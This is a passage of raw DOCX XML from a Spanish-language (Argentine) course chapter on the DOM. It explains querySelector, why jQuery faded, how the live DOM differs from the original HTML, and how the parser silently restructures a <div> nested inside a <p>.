            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>querySelector</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> y </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>querySelectorAll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29245DE8" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>2008</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1624A0A5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Durante años fue obligatoria. Hoy no, y el motivo no es el que uno supone: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>no pasó de moda; la plataforma incorporó lo que aportaba.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1F16F52F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="DEEBF7" w:fill="DEEBF7"/>
          </w:tcPr>
          <w:p w14:paraId="16338A20" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="2E74B5"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>PARA ENTENDER: por qué jQuery desapareció, y qué tiene que ver con vos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5246993C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Es la mejor respuesta a una pregunta que te vas a hacer: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>«¿por qué el TPI me prohíbe usar un framework?»</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="797161B1" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">jQuery no desapareció porque apareciera algo mejor: desapareció porque </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>el problema que resolvía dejó de existir</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>. Y la única forma de darte cuenta es conocer el problema.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DBDCDC6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Quien aprendió jQuery sin entender el DOM siguió usándolo diez años de más, cargando 90 kilobytes para hacer lo que </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>querySelector</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> hace gratis. No por tonto: porque nunca supo qué resolvía esa biblioteca.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="458BCBD1" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Lo mismo te va a pasar con React si lo aprendés antes que esto.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> No perdés tiempo con el DOM: comprás la capacidad de juzgar cuándo un framework te sirve y cuándo te sobra.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EC8C0E6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc239319978"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.3 — El DOM no es el HTML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="069D1392" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc239319979"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Qué dice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="53047D9D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">El Capítulo 1 estableció la distinción en su sección 1.7.1. Acá se vuelve operativa, porque a partir de esta clase el código va a modificar el árbol, y esa modificación </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>no toca el HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E53C500" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc239319980"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>En criollo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="1EB99075" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">En el Capítulo 1 quedó la imagen: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el HTML es el plano en papel y el DOM es la casa construida. A partir de acá dejás de mirar la casa: empezás a tirar paredes.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3955"/>
        <w:gridCol w:w="2506"/>
        <w:gridCol w:w="2555"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="40C3ACAA"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FE78AEE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Qué es</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0C9AFAC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Cómo se ve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464F97A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Cuándo cambia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="6A61981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DC3D7EA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>El HTML original</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4D3F03E6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Ctrl+U</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>, o la pestaña de respuesta del panel de red</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05856ADF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Nunca: es lo que llegó</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="615C666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D14BB91" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>El DOM actual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5F6C8443" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>El panel de elementos del inspector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="611AEF54" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Cada vez que el código lo modifica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="7AAAA1A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0D20F35" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>document.documentElement.outerHTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="059E3328" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Se evalúa en la consola</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="211D4346" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Es una </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>serialización</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> del DOM actual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F097476" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">La tercera fila es la que hace ruido. Pedirle al DOM su representación como texto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>no te devuelve el HTML original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: devuelve el marcado del árbol tal como está ahora, con tus modificaciones aplicadas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>y con los errores de marcado ya corregidos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> por el algoritmo de recuperación de 1.7.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C5D492" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">De ahí una técnica de diagnóstico: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>si el marcado tenía un error, el DOM te muestra el árbol corregido, y comparar los dos es la forma de descubrirlo.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Una etiqueta mal anidada no produce mensaje: produce un árbol distinto del que escribiste.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1A5BA62B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDECEA" w:fill="FDECEA"/>
          </w:tcPr>
          <w:p w14:paraId="4878A8B3" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>OJO ACÁ: el `&lt;div&gt;` adentro del `&lt;p&gt;`</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57ECB5B0" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Hay un caso que desconcierta a todo el mundo la primera vez: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">poner un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;div&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> dentro de un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;p&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F0318E6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">El parser no te avisa. Pero como la especificación dice que un párrafo no puede contener bloques, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">cierra el </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;p&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> antes del </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;div&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> y te arma un árbol distinto del que escribiste: tu CSS de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>p &gt; .algo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> deja de funcionar y no hay error en ningún lado. Lo mismo con una tabla: lo que no sea </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;tr&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> dentro de un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;tbody&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> se reubica solo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24DF01FA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Cuando el CSS no aplica y jurás que el selector está bien, mirá el árbol en el inspector antes que nada.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49028B00" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc239319981"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.4 — Anatomía del árbol: todo es un nodo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="019B4E81" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Todo en el documento es un nodo, y hay más tipos de los que uno supone. Te importan cuatro:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3006"/>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3005"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="0E4A0A85"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E1F53A0" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Tipo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2D7F3C5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Constante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1AFBF48" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Qué representa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="127C283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982503B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Elemento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="274CBEF4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4646501C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Una etiqueta: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;div&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;p&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;button&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="2935834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01FFBAF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Texto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
